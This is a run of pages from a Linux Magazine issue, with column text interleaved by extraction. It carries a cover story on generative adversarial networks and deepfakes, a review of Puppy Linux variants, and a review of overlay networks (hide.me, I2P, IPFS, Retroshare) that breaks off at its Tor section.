name detection’ thing, but that’s more of concurrent updates (server does any duced by the patches. In any event,
a higher-level metadata thing separate needed serialisation) so it is converted. Neil isn’t actually submitting the code
from the actual code merge). “This series also converts nfsd to use yet; he’s just requesting comments.
“So git doesn’t assume any ‘seman- the new interfaces so concurrent incom- However, it does seem very likely that
tics’ to the changes. If it sees that two ing NFS requests in the one directory can this code or something like it will go
branches changed the same code in dif- be handled concurrently. into the VFS at some point in the near
ferent ways, git will go ‘this is a con- “As a net result, if an NFS mounted file- future, just because there are filesys-
flict’, and leave it to human (or system is reexported over NFS, then multi- tems like NFS that do seem to show a
scripted) intervention. ple clients can create files in a single significant benefit from it. Q Q Q

14 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

COVER STORY
Generative Adversarial Networks

Exploring the power of generative adversarial networks

The Art of Forgery

Auction houses are selling AI-based artwork that looks like it came from the grand masters.
The Internet is peppered with photos of people who don’t exist, and the movie industry
dreams of resurrecting dead stars. Enter the world of generative adversarial networks.
By Carina Schipper

M
achine learning models that could recognize objects His plan required two networks, the generator and the dis-
in images – and even create entirely new images – criminator, interacting as counterparts. The best way to under-
were once no more than a pipe dream. Although stand this idea is to consider an analogy. On one side is an art
the AI world discussed various strategies, a satisfac- forger (generator). The art forger wants to, say, paint a picture
tory solution proved illusive. Then in 2014, after an animated in the style of Vincent van Gogh in order to sell it as an original
discussion in a Montreal bar, Ian Goodfellow came up with a to an auction house. On the other hand, an art detective and a
bright idea. real van Gogh connoisseur at the auction house try to identify
At a fellow student’s doctoral party, Goodfellow and his forgeries. At first, the art expert is quite inexperienced, but the
colleagues were discussing a project that involved mathe- detective immediately recognizes that it is not a real van Gogh.
matically determining everything that makes up a photo- Nevertheless, the counterfeiter does not even think of giving
graph. Their idea was to feed this information into a ma- up. The forger keep practicing and trying to foist new and bet-
chine so that it could create its own images. At first, Good- ter paintings off on the detective. In each round, the painting
fellow declared that it would never work. After all, there looks more like an original by a famous painter, until the detec-
were too many parameters to consider, and it would be hard tive finally classifies it as genuine.
to include them all. But back home, the problem was still on This story clearly describes the idea behind GANs. Two neural
Goodfellow’s mind, and he actually found the solution that networks – a generator and a discriminator – play against each
same night: Neural networks could teach a computer to cre- other and learn from each other. Initially, the generator receives
ate realistic photos. a random signal and generates an image from it.Combined with

Figure 1: The Paris-based Obvious collec-

tive, which is made up of AI experts and
artists exploring the creative potential of
artificial intelligence, used a GAN to gen-
erate this painting (Source: Obvious). Figure 2: Image generated by NightCafé. © rolffimages, 123RF.com

16 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

instances of the training dataset (real images), this output forms buzzword “time machine” after three training runs. Users can
the input for the second network, the discriminator. Then the achieve quite respectable results in a short time, as Figure 3
discriminator assigns the image to either the training dataset or shows. But if you want to refine your image down to the
the generator and receives information on whether or not it was smallest detail, you have to buy credit points.
correct. Through back propagation, the discriminator’s classifi- GANs don’t just mimic brushstrokes. Among other things,
cation then returns a signal to the generator, which uses this they create extremely authentic photos of people. The website
feedback to adjust its output accordingly. thispersondoesnotexist.com [4] provides some impressive ex-
The game carries on in as many iterations as it takes for both amples. The site is backed by AI developer Phillip Wang and
networks to have learned enough from each other for the dis- NVIDIA’s StyleGAN [5]. On each refresh, StyleGAN generates a
criminator to no longer recognize where the final image came new, almost frighteningly realistic image of a person who is
from. The generator part of a GAN learns to generate fake data completely fictitious (Figure 4). Right off the bat, it’s very diffi-
by following the discriminator’s feedback. By doing so, the cult to identify the image as a fake.
generator convinces the discriminator to classify the genera- Jevin West and Carl Bergstrom of the University of Washing-
tor’s output as genuine. ton, as part of the Calling Bullshit Project, at least give a few
hints on their website at whichfaceisreal.com that can help
From AI to Art users distinguish fakes [6]. There are, for example, errors in the
One of the best-known examples of what GANs are capable of in images that look like water stains and clearly identify a photo
practical terms is the painting “Portrait of Edmond Belamy” [1] as generated by StyleGAN, or details of the hairline or the
from the collection “La Famille de Belamy”
(Figure 1). Auctioned at Christie’s for
$432,500 in 2018, the artwork is signed by
the algorithm that created it. This shows
what GANs are backed up by in terms of
mathematics and game theory: the mini-
max strategy. The algorithm is used to de-
termine the optimal game strategy for fi-
nite two-person zero-sum games such as
checkers, nine men’s morris, or chess.
With its help and a training dataset of
15,000 classical portraits, the Parisian art-
ist collective Obvious generated the like-
ness of Edmond Belamy, as well as those
of his relatives [2].
Today, AI works of art are flooding art
markets and the Internet. In addition,
you will find websites and apps that
allow users to generate their own artifi-
cial works in numerous styles using
keywords or uploaded images. Figure 2,
for example, comes from NightCafé [3] Figure 3: A catchword and style parameters are all you need to gener-
and demonstrates what AI makes of the ate a scene in cyberpunk style.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 17

COVER STORY
Generative Adversarial Networks

earlobes that do not really match. Sometimes irregularities ap- datasets. The GAN can then mime new movements on the ac-
pear in the background, too. The AI doesn’t really care about tors’ faces to match the lip-synched speech.
the background because it is trained to create faces. But this is just a small teaser of what GANs could do in the
context of movies. In various projects, researchers are working
GANs and Moving Images on resurrecting the deceased through AI. For example, develop-
Faces are also the subject in another still fairly unexplored ap- ers at MIT resurrected Richard Nixon in 2020, letting him be-
plication for GANs, the movie industry. Experts have long rec- moan a failed moon mission in a fake speech to the nation [7].
ognized the potential of GAN technology for film. It is used, for The same method could theoretically be applied to long-de-
example, to correct problematic blips in lip-synched series or ceased Hollywood celebrities.
movies. The actors’ facial expressions and lip movements often
do not match the dialog spoken in another language, and the GANTheftAuto
audience finds this dissonance distracting. The traditional way to develop computer games is to cast them
GANs and deep fakes solve the problem. Deep fakes replace in countless lines of code. Programming simple variants does
the facial expressions and lip movements from the original re- not pose any special challenges for AI. A set of training data
cording. To create deep fakes, application developers need to and NVIDIA’s GameGAN generator[8], for example, is all you
feed movies or series in a specific language into training need for a fully interactive game world to emerge at the end.
The Pacman version by an NVIDIA AI, or an Intel model that
can be used to implement far more realistic scenes in video
games demonstrate how far the technology has advanced.
However, this by no means marks the limits of what is possi-
ble. In 2021, AI developers Harrison Kinsley and Daniel Kukiela
reached the next level with GANTheftAuto [9] (Figure 5). With
the help of GameGAN, they managed to generate a playable
demo version of the 3D game Grand Theft Auto (GTA) V. To do
this, the AI – as in NVIDIA’s Pacman project – has to do exactly
one thing: play, play, and play again.
Admittedly, the action-adventure classic game is far more
complex with its racing and third-person shooter influences.
The training overhead increases massively with this complex-
ity, which is why Kinsley and Kukiela initially concentrated on
a single street. They had their AI run the course over and over
again in numerous iterations, collecting the training material it-
self. While doing so, GameGAN learned to distinguish between
the car and the environment.
The bottom line: GANTheftAuto is still far removed from the
Figure 4: NVIDIA’s StyleGAN delivers such good graphical precision of full-fledged video games, but it is worth
results that viewers often can’t tell if it’s a real per- watching and likely to be trendsetting. At least the AI managed
son or not (Source: thispersondoesnotexist.com). to correctly copy details such as the reflection of sunlight in the
rear window or the shadows cast by the
car from GTA V. And it reproduced them
correctly, as Kinsley explains in a demo
video on YouTube [10].

Resources
As you can probably guess, a system of
two adversarial neural networks is a
complex thing, and programming one
from scratch is a difficult road unless
you have considerable experience with
AI. Still, several resources are available
for those who wish to further explore
this fascinating field.
First of all, Ian Goodfellow’s original
GAN code is still available on GitHub
[11], and you are free to download it
yourself and experiment. The code is
mostly in Python, and the authors in-
Figure 5: By running through a road section in GTA V over and over clude the following note: “We are an ac-
again, the AI generates a visually realistic demo (Source: YouTube). ademic lab, not a software company,

18 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 COVER STORY
Generative Adversarial Networks

and we have no personnel devoted to

documenting and maintaining this re-
search code. Therefore this code is of-
fered with absolutely no support.” The
GitHub page makes reference to the
original June 2014 article “Generative
Adversarial Networks” by Ian Goodfel-
low, Jean Pouget-Abadie, Mehdi Mirza,
Bing Xu, David Warde-Farley, Sherjil
Ozair, Aaron Courville, and Yoshua
Bengio. The article, which is also avail-
able today for free download at the
arxiv.org website [12], offers a technical
introduction that is a good starting
point if you are looking for more infor-
mation on GANs. The first two sen-
tences of the abstract succinctly sum up
this promising technique: “We propose
a new framework for estimating genera-
tive models via an adversarial process, Figure 6: GAN Lab lets you watch a GAN at work, with a very simple
in which we simultaneously train two example to maximize the illustrative effect.
models: a generative model G that cap-
tures the data distribution, and a discriminative model D that and more convincing fake videos could compound the problem
estimates the probability that a sample came from the train- significantly. The best way to prepare for this challenge is to
ing data rather than G. The training procedure for G is to raise awareness about the power of GANs. Q Q Q
maximize the probability of D making a mistake.”
You’ll also find several other GAN implementations, some Info
showcasing different AI development tools, including a Torch im- [1] Portrait of Edmond de Belamy:
plementation [13] and a TensorFlow-based lightweight library for https://en.wikipedia.org/wiki/Edmond_de_Belamy
training GANs [14]. Other projects let you use GANs to edit im- [2] Obvious: https://obvious-art.com/page-projects/
ages [15], generate images from text [16], and even generate [3] NightCafé: https://creator.nightcafe.studio/my-creations
anime characters [17].
[4] Thispersondoesnotexist.com:
If you want to explore GANs but you’re not quite ready to dive https://thispersondoesnotexist.com/
down into the code, you will also find some illuminating demo
[5] StyleGAN: https://github.com/NVlabs/stylegan
sites online that will give you a closer look. One example is GAN
[6] Whichfaceisreal.com: https://www.whichfaceisreal.com/
Lab [18] (Figure 6), an application developed by the Polo Club of
Data Science, a group of programmers and scientists affiliated [7] Nixon Deepfake: https://www.scientificamerican.com/article/
a-nixon-deepfake-a-moon-disaster-speech-and-an-
with Georgia Tech University. GAN Lab is an application that lets
information-ecosystem-at-risk1/
you experiment with GANs in your browser window. To maximize
[8] GameGAN: https://nv-tlabs.github.io/gameGAN/
its effect as a teaching tool, GAN Lab takes a very simple ap-
proach. Rather than generating a computerized painting or a fake [9] GANTheftAuto on GitHub:
video, the Lab simply generates a scattering of data points to https://github.com/Sentdex/GANTheftAuto
match a sample. The user can choose a preconfigured sample [10] GANTheftAuto on YouTube:
data distribution pattern or define a custom pattern. https://www.youtube.com/watch?v=udPY5rQVoW0
[11] Code and Hyperparameters for the Paper “Generative Adver-
Curse, Blessing, or Both? sarial Networks”: https://github.com/goodfeli/adversarial
In the nearly two decades since Ian Goodfellow got the ball [12] “Generative Adversarial Networks” by Ian Goodfellow, Jean
rolling, GANs have taken several fields by storm, and the tech- Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley,
Sherjil Ozair, Aaron Courville, and Yoshua Bengio: https://
nology is still rapidly evolving. Generative AI is already deliver-
arxiv.org/abs/1406.2661
ing impressive results, especially in the context of images and
[13] gans-collection.torch:
video, and the technique is still in its infancy. Future possibili-
https://github.com/nashory/gans-collection.torch
ties include assisting with medical imaging methods, such as
[14] Tooling for GANs in TensorFlow:
X-rays, CT scans, or MRIs. With the help of an AI-modeled dis-
https://github.com/tensorflow/gan
ease progression, doctors could adjust their treatment at an
early stage to improve outcomes. [15] Invertible Conditional GANs for Image Editing:
https://github.com/Guim3/IcGAN
But for all the hype surrounding GANs, the technology also
has its downsides: It drastically simplifies the process of creat- [16] TAC-GAN: https://github.com/dashayushman/TAC-GAN
ing fake content. The Internet has played an important role in [17] animeGAN: https://github.com/jayleicn/animeGAN
publishing and disseminating false information for many years, [18] GAN Lab: https://poloclub.github.io/ganlab/

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 19

REVIEW
Distro Walk – Puppy Linux

Puppy Linux

The Pick of the Litter

Trying out Puppy Linux requires picking a Puppy distribution. We provide a brief overview of some
of the most popular Puppy variants. By Bruce Byfield

L
ast issue, I described the com- examining how the sub-projects differ might help users trying to decide which
plexities of Puppy Linux [1], with from each other. This month, I am rem- one to use.
help from project members. Un- edying that lack with a brief look at All the Puppy distributions on the
like most distributions, Puppy is a some of the most popular Puppy distri- home page [2] share certain features:
collection of sub-projects, and explain- butions and how they differ from each • They all are built with woof-CE, which
ing the structure left no room for other. My hope is that this information builds a distribution using another dis-
tribution’s binary. Several official
Puppy distributions are based on long-
term suport (LTS) releases of Ubuntu,
but are quite different from each other
in their selection of desktops and
packages.
• They all use a standard installer that
allows a Frugal install, to a single di-
rectory, or a Full install, which uses an
entire filesystem. A Frugal install is
recommended because it allows Puppy
to coexist with other operating sys-
tems on the same partition.
• They all load system files into RAM.
• They all encrypt personal files.
Photo by Nicole Romero on Unsplash

• They all provide a Quick setup for con-

figuration that can be modified in
more detail if necessary.
• They all offer the option to save the
current desktop settings for your next
login when shutting down.
Many but not all Puppy distributions
Figure 1: If you’ve seen a review of Puppy Linux, FossaPup is the Puppy also share common utilities and appli-
distribution being examined. cations, such as the QuickPet package

20 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 REVIEW
Distro Walk – Puppy Linux

(Figure 2), unlike most Puppy distribu-

tions, which rely on the fact that sys-
tem files are loaded into RAM for secu-
rity and personal files are encrypted.
The boot manager advises that Xe-
nialPup is intended “for machines
with severe video problems,” and
users may find that the mouse behaves
erratically unless used slowly at the
default 1024x768 resolution until prop-
erly configured.

BionicPup
BionicPup (Figure 3) is another variant
of FossaPup. Besides being based on
Ubuntu 18.04, its main difference is that
it features a dock on the desktop. Like
XenialPup, BionicPup is supposed to be
for severe video problems, but in prac-
tice, it seems less erratic than XenialPup.
The default apps include several larger
Figure 2: At first boot, XenialPup offers to create a root password. apps such as Inkscape. As you log out
for the first time, BionicPup also offers
installer. To keep the memory used to a the Boot Manager, BeeDiff, and Pup- an experimental option of enabling a
minimum, many also provide a link for Save are well worth investigating. regular user account called finn – some-
installing LibreOffice in the menu thing that is not done automatically on
rather than installing it by default. Be- XenialPup most Puppy distributions.
sides the choice of widgets, themes, XenialPup resembles FossaPup, al-
and desktops, the selection of applica- though it is built with Ubuntu 16.04 Slacko Puppy 7.0
tions is often one of the major differ- (Xenial Xerus). It shares FossaPup’s Two versions of Slacko Puppy are
ences between Puppy distributions. arrangement of desktop icons, but it among Puppy’s official distributions,
The Puppy Linux distributions covered does not include the system widgets with the Slacko Puppy 7.0 being the
here are all official distributions main- on the desktop. Unlike FossaPup, Xe- most recent. Built on Slackware 14.2,
tained by the project [2], with the ex- nialPup has a crowded bottom panel. Slacko runs a MATE/Gnome 2 desktop.
ception of Vanilla Dpup [3], which is At first login, XenialPup offers the op- Although its default browser is Firefox,
an unofficial distribution (or puplet) tion to create a root password Slacko Puppy’s menu contains links for
maintained by the community.

FossaPup
FossaPup receives a lot of attention be-
cause it is the first distribution listed
on Puppy’s home page. Usually, a re-
view of Puppy is actually a review of
FossaPup, even though it is not partic-
ularly representative of the rest. Built
with Ubuntu 20.4 (Focal Fossa) and
using Joe’s Window Manager (JWM),
FossaPup installs with icons on the
desktop, grouped together in related
rows. A widget on the right of the
desktop shows system information
(Figure 1). FossaPup’s selection of
apps favors those with a small foot-
print, such as Gnumeric and AbiWord.
While LibreOffice Writer and Calc are
installed by default, Draw, Impress,
and Math are not. Many other default
apps are probably new to the users of
major distributions, although ones like Figure 3: BionicPup offers to set up a root and single-user account.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 21

REVIEW
Distro Walk – Puppy Linux

as it sounds. Although I hope these brief notes will help

newcomers choose a Puppy distribution, trying them all is
less of an effort than it would be with other distributions.
For one thing, with images of 270-450MB, Puppy distribu-
tions are much smaller than Debian or Fedora. Moreover,
Frugal installs and the rapid loading of live images mean
that every one of the Puppy distributions on the home
page can be installed in about an hour. As a result, explor-
ing all of the Puppy Linux distributions is easy. With any
luck, these notes will make that job even easier. Q Q Q

Info
[1] “Distro Walk – Puppy Linux: Running with the Pack” by
Bruce Byfield, Linux Magazine, issue 265, December
2022, pp. 30-32

Figure 4: Slacko Puppy is perfect for those who want to [2] Puppy Linux: https://puppylinux-woof-ce.github.io
heavily customize their installation. [3] Vanilla Dpup: https://vanilla-dpup.github.io

installing LibreOffice and the Brave,

Chrome, and Vivaldi browsers. Its menu
is also full of tools for configuring the
install from the desktop, many of them
unique, making Slacko Puppy 7.0 the
ideal choice for those who like to heav-
ily customize their systems (Figure 4).
In my experience, it is also the fastest
Puppy distribution.

Tahrpup
With a desktop resembling FossaPup’s,
Tahrpup is based on Ubuntu 14.4 (Trusty
Tahr). It installs a moderate number of
default applications, many of which are
not found outside of Puppy distributions.
Like XenialPup, Tahrpup’s mouse is er-
ratic before being adjusted (Figure 5).
Figure 5: Like many Puppy distributions, Tahrpup is built using an
Vanilla Dpup Ubuntu LTS release.
Vanilla Dpup is built on Debian 11 and
uses a modified MATE/Gnome 2 desktop
environment. It installs a minimum of
default applications, which includes
Firefox, but leans towards utilities and
lighter tools like the Sylpheed email
browser. The first thing you will proba-
bly want to do after installing Vanilla
Dpup is to open the Default Applications
Chooser and select your preferred word
processor, spreadsheet, and utilities from
the drop-down lists (Figure 6).

Adopting a Puppy
The Puppy home page would benefit from
brief descriptions like these to give new-
comers some guidance. Instead, the gen-
eral attitude is that newcomers should just
jump in and try different Puppy variants. Figure 6: Based on Debian, Vanilla Dpup is an unofficial Puppy distribu-
However, that outlook is not as indifferent tion that leaves the selection of packages largely up to the user.

22 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 REVIEW
Overlay Networks

Communicate securely on the Internet with an overlay network

Keeping Secrets
An overlay network will help you block unwanted eavesdroppers on the Internet. We show you
some of the leading open source options. By Erik Bärwaldt

G
overnment surveillance, attacks on VPNs, depend on peer-to-peer con- log any user data. In addition, eVenture
by criminals, and tracking by nections that do not require centralized has had security audits performed by in-
the advertising industry are servers, which makes it far more diffi- dependent third-party vendors [2]. On
raising concerns about the secu- cult for attackers and authorities to ac- Linux, hide.me uses the modern Wire-
rity and anonymity of user data. These cess user data. Guard protocol by default in combina-
concerns are amplified in professions tion with fast ChaCha20-Poly1305 en-
where the user is legally responsible for hide.me cryption. In addition, you can download
securing communication. Several free The hide.me [1] VPN solution originates the hide.me source code for free on
projects have addressed these concerns from Malaysia. The provider, eVenture GitHub.
by offering innovative technical ap- Ltd., offers several subscription models The free hide.me variant offers limited
proaches to anonymizing data. We de- for using the service and makes clients functionality. For example, your choice
cided to take a look at a few of the lead- available for download across platforms. is limited to five server locations, and
ing solutions. For Linux, there is currently only a CLI the data volume is limited to 10GB per
Anonymized networks establish tun- client. On top of this, hide.me can also month. In addition, the free account
neled and encrypted connections be- be used as a browser extension for only allows you one VPN connection.
tween individual nodes, ruling out typi- Firefox and Chrome-based web brows- The commercial offering eliminates
cal attack vectors, such as man-in-the- ers. The VPN network consists of more these restrictions, offers a static IP ad-
middle attacks. In the process, these an- than 2,000 servers in over 75 interna- dress option, and also supports stream-
Lead Image © kanokpol prasankhamphaibun, 123RF.com

onymization solutions build a two-way tional locations. To use the service, you ing services like Netflix. A kill switch
point-fixed overlay network through first need to register. All you need is a and split tunneling are available on
which the participants exchange data. valid email address, which you can use Linux. (Split tunneling allows access to
These solutions support common trans- to create and activate an account. You the Internet beyond the VPN tunnel.)
port protocols, such as UDP or TCP, as can define the username and password To install the Linux app, go to hide.
well as the Internet layer protocols IPv4 individually. me’s GitHub page and download the
and IPv6. In some cases, BitTorrent and Hide.me attaches great importance to TAR.XZ archive intended for your hard-
blockchain technologies are also used to security features. For example, eVenture ware architecture. Hide-me supports 32-
enable distribution of data blocks. operates its own DNS servers, avoiding and 64-bit PCs, as well as ARM-based
All solutions for anonymized Internet the kind of DNS leaks that you otherwise systems. Unpack the downloaded ar-
are based on decentralized structures. occasionally encounter. eVenture also chive, and install the client in a termi-
Many of the solutions, with the excep- adheres to a strict no-log policy and, ac- nal window with root privileges using
tion of the Tor network and those based cording to its own statement, does not the ./install.sh command (Figure 1).

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 23

REVIEW
Overlay Networks

During the install, the routine prompts applications, such as email clients or as a proxy between applications and the
you for your registration data, so you messengers, are not. I2P network. The Java application re-
need to register with the provider up quires an appropriate runtime environ-
front. After the install, start the VPN I2P ment on the system, although it also
manually by setting it up as a systemd The Invisible Internet Project (I2P) [3] works with the free OpenJDK Java im-
service using the commands in Listing 1. network uses a peer-to-peer approach to plementation.
Replace the Server placeholder with a lo- connect computers. This method in- On Ubuntu, Debian, and their deriva-
cation such as amsterdam-1 or a country volves establishing one-way, tunneled tives, you can install I2P directly from
suffix such as nl. After that, hide.me will overlay connections over the Internet. the repositories; this immediately en-
create the tunnel, and you will be able to Data packets are transported between ables a script to start I2P automatically
use the Internet through the VPN. client computers via routers (known as at system boot time. In addition, you can
Because hide.me is integrated with nodes), with each client having its own integrate your own repository into the
systemd, the VPN is automatically en- cryptographic identifier. The I2P network system; this will be used for automatic
abled whenever you reboot your com- uses its own DNS server to distribute updates later. The developers explain the
puter. You can use the stop and disable content on the network. The individual exact procedure on the project page.
systemctl parameters to disable the VPN connections are end-to-end encrypted, I2P can also run in headless mode –
tunnel at any time. which prevents third parties from view- without a graphical interface. This op-
Although a graphical desktop client is ing the data. tion is especially useful for servers. For
available for other operating systems, Traffic to the regular Internet is han- container environments, a Docker pack-
Linux has so far had to make do with the dled by proxy servers operated by volun- age is available from Docker Hub. The
command-line client. This unnecessarily teers. These proxies are the only central- I2P source code is available for down-
complicates operation, because the con- ized components on the I2P network. All load from the website.
venient server change feature in the routers have their own cryptographic To connect the computer to the I2P
graphical front end is not available. identity. Routing and contact informa- network, enter the i2prouter start com-
Other convenient features are also miss- tion is maintained with the help of a net- mand at the prompt after installation.
ing from the Linux client, which is still work database, which special routers You don’t need administrative rights.
in beta. The hide.me installation script called floodfill routers distribute on the The routine now launches a web
additionally generates private and public network. The I2P network is self-con- browser and opens the I2P router’s con-
keys and manages the key exchange tained and is not used to pass data pack- figuration interface in it. When you get
using HTTPS. Only the client offered by ets to and from public servers. to the interface, first change a couple of
the manufacturer can be used with the For operation within the network, you settings; the I2P Router Console then
hide.me VPN. will find applications like the i2psnark starts up (Figure 2).
However, hide.me does at least sup- BitTorrent client and the I2P messenger, The I2P Router Console has three
port use in web browsers like Firefox, which also do without a server. With the panes: On the far left, you will find
Chrome, and their derivatives. The dis- help of an embedded application, tradi- some statistical data on the the network
advantage of this solution is that, al- tional TCP/IP applications such as SSH access status, the available bandwidth,
though all activities in the web browser or IRC can be tunneled via I2P. and the established tunnel. Bottom right
are then secured by the VPN tunnel, To integrate a client into the I2P net- is a list of the various applications on
data transfers originating from other work, install the I2P router, which acts the I2P network, as well as a list of vari-
ous community sites, some of which
also provide support. Top right, an info
segment shows you the further steps for
configuring the router. In the back-
ground, the system has already found
some other I2P routers.
It is a good idea to adjust the existing
bandwidth first, because it is very low
by default. Click the configuration page
link at the top of the Info section. You
will now be taken to a page with nu-
merous options; the Bandwidth dialog
is already open. Click on the Band-
width Test link to discover the band-
width of the Internet connection, and

Listing 1: Setting Up hide.me

# systemctl enable hide.me@<I>Server<I>
Figure 1: The hide.me client for Linux is currently only available as a # systemctl start hide.me@<I>Server<I>
command line program.

24 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 REVIEW
Overlay Networks

Figure 2: The I2P Router Console allows for convenient graphical administration.

then set the optimal bandwidth for I2P contacted and the subscriber tunnels on the I2P network. However, following
(Figure 3). Once you have adjusted the that the system has established. Band- the links on the router console – and the
bandwidth and saved it by pressing width classes are also specified for links that let you search for other avail-
Save Changes bottom right, the changes each connection. able programs – only generates error
you have made will appear at the top of In the I2P services category, you can messages. You need to install the I2P
the window. call the services handled directly by the messenger client manually.
More detailed links will now also ap- I2P network. Apart from BitTorrent, this To harmonize your web browser with
pear in the bar on the far left; you can also includes the integrated web server, the I2P network, you need to change its
use them to customize various addi- which you can use to create and distrib- proxy settings. To do this, adjust the
tional options. For example, shared cli- ute anonymized web pages. HTTP proxy in Firefox’s settings dialog
ents in the Local Tunnels category There are two email clients in the form (Figure 4). Then go to the advanced set-
gives you detailed information about of Susimail and I2P messenger that let tings, which you can access by typing
the floodfill routers your system has you send and receive anonymized emails about:config in the URL bar, and change

Figure 3: The I2P network lets you manually configure the bandwidth to use for your node.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 25

REVIEW
Overlay Networks

the value for media.peerconnection.ice. of files and web pages [4]. IPFS, estab- browser add-on that makes IPFS data
proxy_only from false to true. lished in 2015, relies on the peer-to-peer available. The browser extension only
principle and is free software. Central- acts as a gateway without providing the
IPFS ized services such as DNS or individual full functionality of the overlay network.
The InterPlanetary File System (IPFS) is web servers do not exist, making distrib- Some Linux distributions already have
primarily used for decentralized storage uted denial-of-service (DDoS) attacks on IPFS binary packages in their reposito-
these services im- ries. You can also obtain a precompiled
possible on an binary package for the IPFS desktop
IPFS network. from GitHub [5]. In addition to RPM and
IPFS stores files DEB packages, AppImage and Snap ar-
and web pages in chives are also available. Development
a decentralized work on these packages is very active, so
way as blocks on it makes sense to get the latest package.
numerous individ- After completing the install, you will
ual nodes, which find a launcher for the IPFS desktop in
protects the infor- the menu of your desktop environment.
mation against Clicking on the launcher opens a native
censorship and de- graphical front end for managing your
letion attempts. own IPFS instance and, at the same
The data is named time, establishes access to the IPFS net-
using hashes that work. The graphical interface (Figure 5),
also change when with its state-of-art design, displays sta-
a file is modified. tistics for your own IPFS node in the
You can use IPFS main area of the window.
either by installing Once the Status window confirms the
software packages connection to IPFS, you can check out
that connect your the world map (Figure 6) to see the other
computer to the IPFS peers across the globe that your
Figure 4: You need to manually prepare the web IPFS network or node is connected to in the Peers group.
browser for use with I2P. opt for a web The client updates the numbers, the

Figure 5: IPFS offers an up-to-date management interface.

26 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 REVIEW
Overlay Networks

Figure 6: You can monitor existing IPFS connections on a world map.

table, and the bandwidth indicators on most popular search engines for the IPFS transferred data completely hidden from
the Status page more or less in real time. network include Almonit, [6] IPFS- third parties. You can also use Retro-
To post your own files on the IPFS net- Search [7], and IPSE [8]. share over the Tor or I2P network, so
work, click on Files in the sidebar on the even neighboring nodes will not see
left. In the dialog that opens, click Im- Retroshare your IP address.
port and select one of the options listed Retroshare [9], which has been in devel- Retroshare relies on friend lists. The
in the drop-down menu. opment for more than 15 years, is pri- local node with a user’s account can
To add data from the IPFS network, marily used for
you need to know and specify the Con- decentralized file
tent Identifier (CID). To keep data perma- sharing and en-
nently available by mirroring it to other crypted communi-
network nodes, you additionally need to cation. Besides file
pin the data. To pin the data, press the sharing, the pro-
button with the three dots. In the context gram focuses on
menu, select the Set pinning option. services such as
To pin the data to your local mass stor- email, instant
age, check the box to the left of the Local messaging, and
node option and then press Apply. The feed readers.
file is now on your local mass storage All of these ser-
and can be retrieved via the known CID vices do without
after shutting down and restarting the central servers
daemon. Alternatively, you can keep and use OpenSSL
data available at all times using a pin- and asymmetric
ning service like Eternum or Pinata. encryption based
There are special search engines to on OpenPGP. This
help you find data on the IPFS network. end-to-end en-
They are still under construction, but cryption keeps the Figure 7: When Retroshare launches for the first
they already provide useful results. The contents of the time, a profile is generated.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 27

REVIEW
Overlay Networks

connect to another node only if the re- envelope on a blue background appears Please note that participating nodes
mote node is entered in the friend list. in the system tray, which gives you must use the latest version 0.6.6 Retro-
Arch Linux, Slackware, Solus, and quick access to the Retroshare window share, which is the first release in which
Void Linux come with Retroshare in at the push of a button. the Retroshare ID replaces the conven-
their package sources. On Retroshare’s At first glance, Retroshare’s interface tional certificates used up to now. Mix-
website, you will find additional in- resembles a conventional email pro- ing old certificates and new retroshare
structions for installation on many gram: A small pane contains various IDs will not work and will result in an
other Linux derivatives, as well as a folders and below that is a quick view error message.
cross-distribution AppImage package. with different attributes for labeling the After adding your friends to your Ret-
You can also pick up a Flatpak from inputs. Messages received appear in roshare instance, there are unlimited
Flathub. In addition, Retroshare runs on two large window segments on the possibilities for communicating through
the Raspberry Pi. Provided you install right, and a buttonbar below contains the system. Retroshare automatically
with a binary package customized for controls and a view field for the mes- transfers any registered friends to the re-
your choice of distribution, the routine sages. A status bar at the very bottom spective contact lists. One specific ad-
will create a starter in the menu of the provides information about the received vantage of Retroshare is that, unlike cen-
desktop environment. and uploaded data. tralized, web-based forums, the forum
Retroshare comes with a sophisticated The buttonbar located horizontally at function lets you compose your posts of-
graphical interface and an initial setup the top of the screen opens up the full fline. They are automatically displayed
wizard. For the setup wizard, you first functionality of the application. You can in the forum after logging in again.
need to specify whether the machine use it to access the various communica- The file-sharing feature works in a
will act as a default node or as a hidden tion modules such as chat, email, data similar way to the BitTorrent service,
node within the Retroshare network on transfer, forums, and contacts. with Retroshare transferring files across
the Tor network. You also create a user To use Retroshare, you need to invite multiple nodes in blocks. This makes it
account in the start-up screen. The bar friends who are also part of the Retro- easy to share even very large files, and
in the lower part of the window shows share network by exchanging Retro- the individual nodes do not have to be
the progress (Figure 7). share IDs. directly connected to each other. But
Press the Go! button to start Retro- Pressing Home in the user interface re- when a transfer relies on multiple nodes,
share. Two separate windows then open. veals your own identifier; below that all of the nodes need to be running or
In addition to the application window, you can add a friend to your installation the file transfer will fail.
Retroshare displays an information win- by clicking on Add friend. The friend However, you can also use the chat or
dow telling you how to get started. At must have sent you their Retroshare ID the email function for file transfer – as
the same time, an icon with a white (by email, for example). long as the files are not too large. In both
chat and email, you will find a paper clip
icon, which opens a file manager from
which you can select the files you want
to attach. Retroshare then attaches the
files to the content for dispatch.

Tor Network
The Tor network is the best known net-
work for anonymized communication
[10], dating back to the 1990s. At the
end of 2002, the Tor network was re-
leased for general use for the first time.
